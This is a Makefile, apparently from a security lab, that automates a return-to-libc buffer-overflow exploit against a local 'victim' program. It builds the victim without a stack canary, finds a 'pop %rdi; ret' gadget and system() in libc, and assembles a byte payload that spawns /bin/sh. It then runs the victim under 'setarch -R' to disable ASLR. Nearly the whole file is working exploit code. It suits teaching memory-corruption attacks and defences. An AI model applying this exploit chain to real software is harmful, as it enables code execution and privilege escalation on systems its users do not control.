# This Makefile automates the construction of an attack against the
# victim program: the classic version executes a shellcode that opens
# /bin/sh, the variant built here makes libc's system() do it instead.
#
# The rules try to obtain most parameters automatically, but you need to
# set two values below by hand: BUFFER, the location of the overflowed
# buffer on the stack (printed to stderr by the victim for convenience),
# and LIBC_BASE, the address where libc is mapped in the victim process.
#
# If the 'make attack' target succeeds, you end up in a non-interactive
# shell: there is no prompt, but typing shell commands shows that you
# really are in a shell.
#
# The second attack uses a return-to-libc approach: it does not require
# an executable stack, but it requires knowing the addresses of a
# 'gadget' (pop %rdi; ret) and of system() inside libc. Those addresses
# are only stable with ASLR disabled, which is why 'make attack' runs
# the victim under 'setarch -R'.

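# --- Parameters that must match the machine you run on -------------------
# Stack address of the overflowed buffer (the victim prints it to stderr).
# Later assignments win, so only the last value is live; the commented one
# is kept as an alternative seen elsewhere.  'make BUFFER=0x... attack'
# overrides it from the command line.
#BUFFER := 0x7fffffffe3c0
BUFFER := 0x7fffffffe2d0

# Load address of libc in the victim: start of the first libc mapping in
# /proc/<pid>/maps (or 'info proc mappings' in gdb).  This value is only
# reproducible because 'make attack' disables ASLR with setarch -R.
#LIBC_BASE := 0x7ffff7e21000
LIBC_BASE := 0x7ffff7df8000

# libc that the victim actually loads (check with ldd ./victim).
# Needs xxd (vim-common) and nm (binutils) below.
LIBC := /lib/x86_64-linux-gnu/libc.so.6

# --- Values derived from LIBC --------------------------------------------
# File offset of the first "pop %rdi; ret" (bytes 5f c3) in libc.
# xxd -c1 -p prints one byte per line, so the 1-based line number of the
# 5f byte minus one is its file offset (awk converts "NNN-5f" to NNN).
# NOTE(review): this scans the whole file, ELF headers and data included;
# if the attack faults, confirm the hit lies in an executable section
# (objdump -d) or take the offset from a ROP gadget finder.
# Simply-expanded (:=) so the multi-megabyte scan runs once at parse time
# instead of on every reference.
GADGET_OFF := 0x$(shell xxd -c1 -p $(LIBC) | grep -n -B1 c3 | grep 5f -m1 | awk '{printf "%x\n",$$1-1}')
#GADGET_OFF := 0x0003b8a0

# Offset of system() from the dynamic symbol table ("ADDR W system@@GLIBC_x").
# Matching on field 3 avoids gawk-only \< \> word anchors, and 'exit'
# guarantees a single value even if several lines match (two values
# joined by a space would break the arithmetic below).
SYSTEM_OFF := 0x$(shell nm -D $(LIBC) | awk '$$3 ~ /^system(@|$$)/ {print $$1; exit}')

# Absolute addresses = mapping base + file offset.  This assumes the file
# offset equals the offset from the first mapping for the segment that
# holds the gadget/system (p_offset == p_vaddr) -- verify with
# 'readelf -l' if the computed addresses disagree with gdb.
GADGET := 0x$(shell printf "%016x" $$(($(LIBC_BASE) + $(GADGET_OFF))))
SYSTEM := 0x$(shell printf "%016x" $$(($(LIBC_BASE) + $(SYSTEM_OFF))))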

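# 'all' only builds and prints the parameters; it never runs the victim.
# info/attack/clean are commands, not files, so declare them phony;
# .DELETE_ON_ERROR removes a half-written attack.bin if its recipe fails
# part-way, so a truncated payload can never look up to date.
.PHONY: all info attack clean
.DELETE_ON_ERROR:
all: info victim attack.bin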

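# Print every value the payload is built from so it can be compared with
# the addresses the victim and gdb report before running 'make attack'.
# (%#x re-prints the already hexadecimal values in a uniform 0x form.)
info:
	@printf "%s\t\t%#x\n" buffer: $(BUFFER)
	@printf "%s\t%#x\n" gadget-offset: $(GADGET_OFF)
	@printf "%s\t%#x\n" system-offset: $(SYSTEM_OFF)
	@printf "%s\t%#x\n" libc-base: $(LIBC_BASE)
	@printf "%s\t\t%#x\n" gadget: $(GADGET)
	@printf "%s\t\t%#x\n" system: $(SYSTEM)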

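# Deliberately weakened build: the stack protector is off so the saved
# return address can be overwritten without tripping a canary.  Nothing
# else is relaxed -- the return-to-libc chain does not need an executable
# stack, and the payload uses no addresses from the victim binary itself
# (only libc and stack addresses), so PIE may stay enabled.
# -fno-stack-protector comes after $(CFLAGS) so a user's flags cannot
# silently re-enable the canary.  Lab use only: never install setuid.
victim: victim.c
	$(CC) $(CFLAGS) -fno-stack-protector -o $@ $<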

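# Payload layout, all multi-byte values little-endian:
#   "/bin/sh"   7 bytes, lands at BUFFER; the filler's zero bytes
#               NUL-terminate it, so it is the string system() receives
#   65 x 0x00   '%0130d' prints 130 '0' characters = 65 bytes after xxd -r
#   GADGET      pop %rdi ; ret      -> rdi = BUFFER
#   BUFFER      address of "/bin/sh" (first argument of system)
#   SYSTEM      system(rdi)
# The 72 bytes of filler before the chain match the victim's frame layout
# (buffer start to saved return address); adjust if victim.c changes.
# 'tac -rs..' reverses the 16 hex digits two at a time, i.e. byte-swaps
# to little-endian.  printf replaces 'echo -n', whose -n is not portable
# across /bin/sh implementations.  The guard fails loudly when the libc
# scan found no offsets (an empty result leaves a bare "0x"), and the
# temp-file write means a failed run cannot leave a stale attack.bin.
attack.bin: Makefile $(LIBC)
	@test "$(GADGET_OFF)" != 0x && test "$(SYSTEM_OFF)" != 0x || \
	    { echo "attack.bin: gadget or system offset not found in $(LIBC)" >&2; exit 1; }
	(printf %s /bin/sh | xxd -p; printf %0130d 0; \
	    printf %016x $(GADGET) | tac -rs..; \
	    printf %016x $(BUFFER) | tac -rs..; \
	    printf %016x $(SYSTEM) | tac -rs..) | \
	    xxd -r -p > $@.tmp && mv -f $@.tmp $@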

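# Run the exploit.  'setarch -R' disables ASLR for the victim (and the
# shell it spawns) only; the payload hard-codes BUFFER and LIBC_BASE, so
# with randomisation on it would only work by coincidence.  'cat attack.bin -'
# keeps stdin open after the payload so the commands you type reach the
# spawned shell.  'uname -m' is the POSIX equivalent of GNU 'arch'.
attack: victim attack.bin
	cat attack.bin - | setarch $$(uname -m) -R ./victim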

# Remove everything this Makefile produces; victim.c is left alone.
clean:
	$(RM) victim attack.bin
